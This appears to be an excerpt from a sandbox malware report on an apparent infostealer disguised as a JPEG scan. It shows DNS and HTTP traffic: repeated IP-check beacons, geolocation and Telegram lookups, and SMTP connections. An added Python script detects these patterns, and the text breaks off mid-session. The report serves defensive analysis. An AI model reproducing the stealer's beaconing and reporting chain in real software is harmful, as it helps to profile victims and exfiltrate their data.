                                                                                                      Oct 25, 2024 09:20:04.926753998 CEST58749779104.243.33.38192.168.2.4
                                                                                                      Oct 25, 2024 09:20:05.085673094 CEST58749779104.243.33.38192.168.2.4
                                                                                                      Oct 25, 2024 09:20:05.086663008 CEST49779587192.168.2.4104.243.33.38
                                                                                                      Oct 25, 2024 09:20:09.780473948 CEST49780587192.168.2.4104.243.33.38
                                                                                                      Oct 25, 2024 09:20:09.785945892 CEST58749780104.243.33.38192.168.2.4
                                                                                                      Oct 25, 2024 09:20:09.942873955 CEST58749780104.243.33.38192.168.2.4
                                                                                                      Oct 25, 2024 09:20:09.943377018 CEST49780587192.168.2.4104.243.33.38
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 25, 2024 09:18:02.402071953 CEST | 61311 | 53 | 192.168.2.4 | 1.1.1.1
Oct 25, 2024 09:18:02.410170078 CEST | 53 | 61311 | 1.1.1.1 | 192.168.2.4
Oct 25, 2024 09:18:04.628822088 CEST | 56335 | 53 | 192.168.2.4 | 1.1.1.1
Oct 25, 2024 09:18:04.639488935 CEST | 53 | 56335 | 1.1.1.1 | 192.168.2.4
Oct 25, 2024 09:18:18.293863058 CEST | 51482 | 53 | 192.168.2.4 | 1.1.1.1
Oct 25, 2024 09:18:18.301110029 CEST | 53 | 51482 | 1.1.1.1 | 192.168.2.4
Oct 25, 2024 09:18:24.901798010 CEST | 50596 | 53 | 192.168.2.4 | 1.1.1.1
Oct 25, 2024 09:18:25.606920004 CEST | 53 | 50596 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 25, 2024 09:18:02.402071953 CEST | 192.168.2.4 | 1.1.1.1 | 0x7ec0 | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
Oct 25, 2024 09:18:04.628822088 CEST | 192.168.2.4 | 1.1.1.1 | 0x408f | Standard query (0) | reallyfreegeoip.org | A (IP address) | IN (0x0001) | false
Oct 25, 2024 09:18:18.293863058 CEST | 192.168.2.4 | 1.1.1.1 | 0x3658 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Oct 25, 2024 09:18:24.901798010 CEST | 192.168.2.4 | 1.1.1.1 | 0xe4ef | Standard query (0) | mail.kafs.co.ug | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 25, 2024 09:18:02.410170078 CEST | 1.1.1.1 | 192.168.2.4 | 0x7ec0 | No error (0) | checkip.dyndns.org | checkip.dyndns.com | | CNAME (Canonical name) | IN (0x0001) | false
Oct 25, 2024 09:18:02.410170078 CEST | 1.1.1.1 | 192.168.2.4 | 0x7ec0 | No error (0) | checkip.dyndns.com | | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Oct 25, 2024 09:18:02.410170078 CEST | 1.1.1.1 | 192.168.2.4 | 0x7ec0 | No error (0) | checkip.dyndns.com | | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Oct 25, 2024 09:18:02.410170078 CEST | 1.1.1.1 | 192.168.2.4 | 0x7ec0 | No error (0) | checkip.dyndns.com | | 193.122.6.168 | A (IP address) | IN (0x0001) | false
Oct 25, 2024 09:18:02.410170078 CEST | 1.1.1.1 | 192.168.2.4 | 0x7ec0 | No error (0) | checkip.dyndns.com | | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Oct 25, 2024 09:18:02.410170078 CEST | 1.1.1.1 | 192.168.2.4 | 0x7ec0 | No error (0) | checkip.dyndns.com | | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Oct 25, 2024 09:18:04.639488935 CEST | 1.1.1.1 | 192.168.2.4 | 0x408f | No error (0) | reallyfreegeoip.org | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Oct 25, 2024 09:18:04.639488935 CEST | 1.1.1.1 | 192.168.2.4 | 0x408f | No error (0) | reallyfreegeoip.org | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Oct 25, 2024 09:18:18.301110029 CEST | 1.1.1.1 | 192.168.2.4 | 0x3658 | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001) | false
Oct 25, 2024 09:18:25.606920004 CEST | 1.1.1.1 | 192.168.2.4 | 0xe4ef | No error (0) | mail.kafs.co.ug | kafs.co.ug | | CNAME (Canonical name) | IN (0x0001) | false
Oct 25, 2024 09:18:25.606920004 CEST | 1.1.1.1 | 192.168.2.4 | 0xe4ef | No error (0) | kafs.co.ug | | 104.243.33.38 | A (IP address) | IN (0x0001) | false
• reallyfreegeoip.org
• api.telegram.org
• checkip.dyndns.org
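The DNS answers and HTTP sessions in this report show the same probe over and over: a GET / to checkip.dyndns.org with a hard-coded IE 6 / .NET CLR 1.0.3705 User-Agent, issued first by the submitted sample (PID 1260) and then by the dropped copy in AppData\Roaming (PID 7448), followed by lookups of reallyfreegeoip.org, api.telegram.org and mail.kafs.co.ug. The script below is an added example, not part of the Joe Sandbox report, that turns those observations into detection logic: it parses session records of the kind shown on this page, flags the legacy-UA IP-check beacon while letting a modern-browser request to the same host through, pulls out the address the service echoed back, groups beacons per process so the dropper-to-AppData hand-off is visible, and checks that the DNS lookups occur in the IP-check, geolocation, Telegram order. The record dictionaries are constructed from values visible in the report (sessions 0, 2 and 5 and the DNS table); the Firefox control record and the record layout itself are assumptions for illustration. Both checkip.dyndns.com (the DNS query) and checkip.dyndns.org (the HTTP Host header) are accepted, as the report shows both.

```python
# Added example (not from the Joe Sandbox report): detection logic for the
# external-IP-check beacon and the DNS lookup chain shown in the tables above.
# All sample records are constructed from values visible in the report.
import re
from collections import defaultdict

# User-Agent the sample sends on every checkip request (copied from the report).
LEGACY_UA_RE = re.compile(
    r"Mozilla/4\.0 \(compatible; MSIE 6\.0; Windows NT 5\.2; \.NET CLR ?1\.0\.3705;?\)")
IP_CHECK_HOSTS = {"checkip.dyndns.org", "checkip.dyndns.com"}
REPORTED_IP_RE = re.compile(r"Current IP Address:\s*(\d{1,3}(?:\.\d{1,3}){3})")

# Hypothetical record layout: one dict per request/response pair.
# Constructed from sessions 0, 2 and 5 of the report.
SAMPLE_UA = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)"
CHECKIP_BODY = ("<html><head><title>Current IP Check</title></head>"
                "<body>Current IP Address: 173.254.250.81</body></html>\r\n")
HTTP_RECORDS = [
    {"session": 0, "pid": 1260,
     "process": r"C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe",
     "request": f"GET / HTTP/1.1\r\nUser-Agent: {SAMPLE_UA}\r\nHost: checkip.dyndns.org\r\nConnection: Keep-Alive\r\n\r\n",
     "response_body": CHECKIP_BODY},
    {"session": 2, "pid": 7448,
     "process": r"C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe",
     "request": f"GET / HTTP/1.1\r\nUser-Agent: {SAMPLE_UA}\r\nHost: checkip.dyndns.org\r\nConnection: Keep-Alive\r\n\r\n",
     "response_body": CHECKIP_BODY},
    {"session": 5, "pid": 7448,
     "process": r"C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe",
     "request": f"GET / HTTP/1.1\r\nUser-Agent: {SAMPLE_UA}\r\nHost: checkip.dyndns.org\r\n\r\n",
     "response_body": CHECKIP_BODY},
    # Constructed control record (not in the report): a browser hitting the same host.
    {"session": 9, "pid": 4242,
     "process": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "request": "GET / HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0\r\nHost: checkip.dyndns.org\r\n\r\n",
     "response_body": CHECKIP_BODY},
]

# Query names in the order the report's DNS answers table lists them.
DNS_QUERY_ORDER = ["checkip.dyndns.com", "reallyfreegeoip.org", "api.telegram.org", "mail.kafs.co.ug"]


def parse_request(raw):
    """Split a raw HTTP/1.1 request into (method, target, headers); header names lower-cased."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return method, target, headers


def is_ip_check_beacon(raw_request):
    """True for the sample's external-IP probe: GET / to a checkip host with the
    hard-coded IE6/.NET CLR 1.0.3705 User-Agent. A modern browser UA to the same
    host is not flagged, so ordinary users do not trip the rule."""
    method, target, headers = parse_request(raw_request)
    return (method == "GET" and target == "/"
            and headers.get("host", "").lower() in IP_CHECK_HOSTS
            and bool(LEGACY_UA_RE.search(headers.get("user-agent", ""))))


def reported_ip(body):
    """Return the address the checkip service echoed back (what the stealer reports home)."""
    m = REPORTED_IP_RE.search(body)
    return m.group(1) if m else None


def beacons_by_process(records):
    """Group flagged beacons per (pid, process). Two different binaries issuing the
    identical probe is the dropper-to-AppData hand-off seen in the report."""
    out = defaultdict(lambda: {"beacons": 0, "reported_ips": set()})
    for r in records:
        if is_ip_check_beacon(r["request"]):
            entry = out[(r["pid"], r["process"])]
            entry["beacons"] += 1
            ip = reported_ip(r["response_body"])
            if ip:
                entry["reported_ips"].add(ip)
    return dict(out)


def dns_chain_matches(query_names):
    """True when lookups occur in the stealer's order: external-IP service, then a
    geolocation API, then the Telegram Bot API. Unrelated names in between are ignored."""
    wanted = iter(["checkip.dyndns.com", "reallyfreegeoip.org", "api.telegram.org"])
    needle = next(wanted)
    for name in query_names:
        if name == needle:
            needle = next(wanted, None)
            if needle is None:
                return True
    return False


if __name__ == "__main__":
    for key, info in beacons_by_process(HTTP_RECORDS).items():
        print(key, info)
    print("DNS chain matches:", dns_chain_matches(DNS_QUERY_ORDER))
```

The User-Agent match is what carries the signal: checkip.dyndns.org alone is too common to alert on, but a .NET CLR 1.0.3705 string from a process under a user's Desktop or AppData\Roaming, repeated several times a second, is not something a browser or the OS produces.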
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49735 | 193.122.130.0 | 80 | 1260 | C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe
Timestamp | Bytes transferred | Direction | Data
Oct 25, 2024 09:18:02.420911074 CEST | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Oct 25, 2024 09:18:03.298923969 CEST | 323 | IN | HTTP/1.1 200 OK
Date: Fri, 25 Oct 2024 07:18:03 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 03cdcc17f073dd2afa1ab36a286c9dcf
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.81</body></html>
Oct 25, 2024 09:18:03.305005074 CEST | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Oct 25, 2024 09:18:04.494503975 CEST | 323 | IN | HTTP/1.1 200 OK
Date: Fri, 25 Oct 2024 07:18:04 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 118feeffaac86ae4d78e6753fc434cc6
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.81</body></html>
Oct 25, 2024 09:18:05.574465036 CEST | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Oct 25, 2024 09:18:05.732852936 CEST | 323 | IN | HTTP/1.1 200 OK
Date: Fri, 25 Oct 2024 07:18:05 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 2d1906e079fe365e9bc1be7d01ace4d5
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.81</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49740 | 193.122.130.0 | 80 | 1260 | C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe
Timestamp | Bytes transferred | Direction | Data
Oct 25, 2024 09:18:06.529268026 CEST | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Oct 25, 2024 09:18:07.213610888 CEST | 323 | IN | HTTP/1.1 200 OK
Date: Fri, 25 Oct 2024 07:18:07 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: cc676d657f8f64ef8942483f7ae427f5
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.81</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49742 | 193.122.130.0 | 80 | 7448 | C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe
Timestamp | Bytes transferred | Direction | Data
Oct 25, 2024 09:18:07.308840990 CEST | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Oct 25, 2024 09:18:07.969799042 CEST | 323 | IN | HTTP/1.1 200 OK
Date: Fri, 25 Oct 2024 07:18:07 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 6e362202fddcc2f08308556d6c71fdbe
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.81</body></html>
Oct 25, 2024 09:18:07.974605083 CEST | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Oct 25, 2024 09:18:08.132110119 CEST | 323 | IN | HTTP/1.1 200 OK
Date: Fri, 25 Oct 2024 07:18:08 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: c66ad35d38ac976d66ee9f2adac2b712
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.81</body></html>
Oct 25, 2024 09:18:09.587796926 CEST | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Oct 25, 2024 09:18:09.761153936 CEST | 323 | IN | HTTP/1.1 200 OK
Date: Fri, 25 Oct 2024 07:18:09 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: b42d970f6b70e7403d835b335788129a
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.81</body></html>
Oct 25, 2024 09:18:10.125269890 CEST | 323 | IN | HTTP/1.1 200 OK
Date: Fri, 25 Oct 2024 07:18:09 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: b42d970f6b70e7403d835b335788129a
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.81</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49743 | 193.122.130.0 | 80 | 1260 | C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe
Timestamp | Bytes transferred | Direction | Data
Oct 25, 2024 09:18:07.984869957 CEST | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Oct 25, 2024 09:18:08.649631977 CEST | 323 | IN | HTTP/1.1 200 OK
Date: Fri, 25 Oct 2024 07:18:08 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: b47ed624f4d6bbff0484b6cbcb18ef16
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.81</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49746 | 193.122.130.0 | 80 | 1260 | C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe
Timestamp | Bytes transferred | Direction | Data
Oct 25, 2024 09:18:09.417397976 CEST | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Oct 25, 2024 09:18:10.125893116 CEST | 323 | IN | HTTP/1.1 200 OK
Date: Fri, 25 Oct 2024 07:18:10 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: c758145f9593442ca46c02db27b1f202
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.81</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49749 | 193.122.130.0 | 80 | 7448 | C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe
Timestamp | Bytes transferred | Direction | Data
Oct 25, 2024 09:18:10.527626038 CEST | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Oct 25, 2024 09:18:11.211352110 CEST | 323 | IN | HTTP/1.1 200 OK
Date: Fri, 25 Oct 2024 07:18:11 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 8187866ac1c89b21883caebc32e6647e
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.81</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49750 | 193.122.130.0 | 80 | 1260 | C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe
Timestamp | Bytes transferred | Direction | Data
Oct 25, 2024 09:18:10.908457041 CEST | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Oct 25, 2024 09:18:11.696222067 CEST | 323 | IN | HTTP/1.1 200 OK
Date: Fri, 25 Oct 2024 07:18:11 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 7116975d6190b5a808d93a1067b793df
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.81</body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      7192.168.2.449753193.122.130.0807448C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 25, 2024 09:18:12.005686998 CEST151OUTGET / HTTP/1.1
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                      Host: checkip.dyndns.org
                                                                                                      Connection: Keep-Alive
                                                                                                      Oct 25, 2024 09:18:13.136481047 CEST323INHTTP/1.1 200 OK
                                                                                                      Date: Fri, 25 Oct 2024 07:18:13 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 106
                                                                                                      Connection: keep-alive
                                                                                                      Cache-Control: no-cache
                                                                                                      Pragma: no-cache
                                                                                                      X-Request-ID: 53b6f0b99f76ec497d5b9dda555439d5
                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.81</body></html>


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
8           192.168.2.4  49754        193.122.130.0   80                1260  C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe
Timestamp                             Bytes transferred  Direction  Data
Oct 25, 2024 09:18:12.511708975 CEST  151                OUT        GET / HTTP/1.1
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                      Host: checkip.dyndns.org
                                                                                                      Connection: Keep-Alive
Oct 25, 2024 09:18:13.886181116 CEST  323                IN         HTTP/1.1 200 OK
                                                                                                      Date: Fri, 25 Oct 2024 07:18:13 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 106
                                                                                                      Connection: keep-alive
                                                                                                      Cache-Control: no-cache
                                                                                                      Pragma: no-cache
                                                                                                      X-Request-ID: 19e5ffcd4f4d9c53f93176b175414612
                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.81</body></html>


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
9           192.168.2.4  49757        193.122.130.0   80                7448  C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe
Timestamp                             Bytes transferred  Direction  Data
Oct 25, 2024 09:18:14.043553114 CEST  151                OUT        GET / HTTP/1.1
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                      Host: checkip.dyndns.org
                                                                                                      Connection: Keep-Alive
Oct 25, 2024 09:18:15.272080898 CEST  323                IN         HTTP/1.1 200 OK
                                                                                                      Date: Fri, 25 Oct 2024 07:18:15 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 106
                                                                                                      Connection: keep-alive
                                                                                                      Cache-Control: no-cache
                                                                                                      Pragma: no-cache
                                                                                                      X-Request-ID: f01e864e400ca64230f96c39dad93e23
                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.81</body></html>


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
10          192.168.2.4  49758        193.122.130.0   80                1260  C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe
Timestamp                             Bytes transferred  Direction  Data
Oct 25, 2024 09:18:14.668287039 CEST  151                OUT        GET / HTTP/1.1
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                      Host: checkip.dyndns.org
                                                                                                      Connection: Keep-Alive
Oct 25, 2024 09:18:15.923504114 CEST  323                IN         HTTP/1.1 200 OK
                                                                                                      Date: Fri, 25 Oct 2024 07:18:15 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 106
                                                                                                      Connection: keep-alive
                                                                                                      Cache-Control: no-cache
                                                                                                      Pragma: no-cache
                                                                                                      X-Request-ID: 5d45201cb8469aba17a2e2fbb113b526
                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.81</body></html>


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
11          192.168.2.4  49762        193.122.130.0   80                7448  C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe
Timestamp                             Bytes transferred  Direction  Data
Oct 25, 2024 09:18:16.052448034 CEST  151                OUT        GET / HTTP/1.1
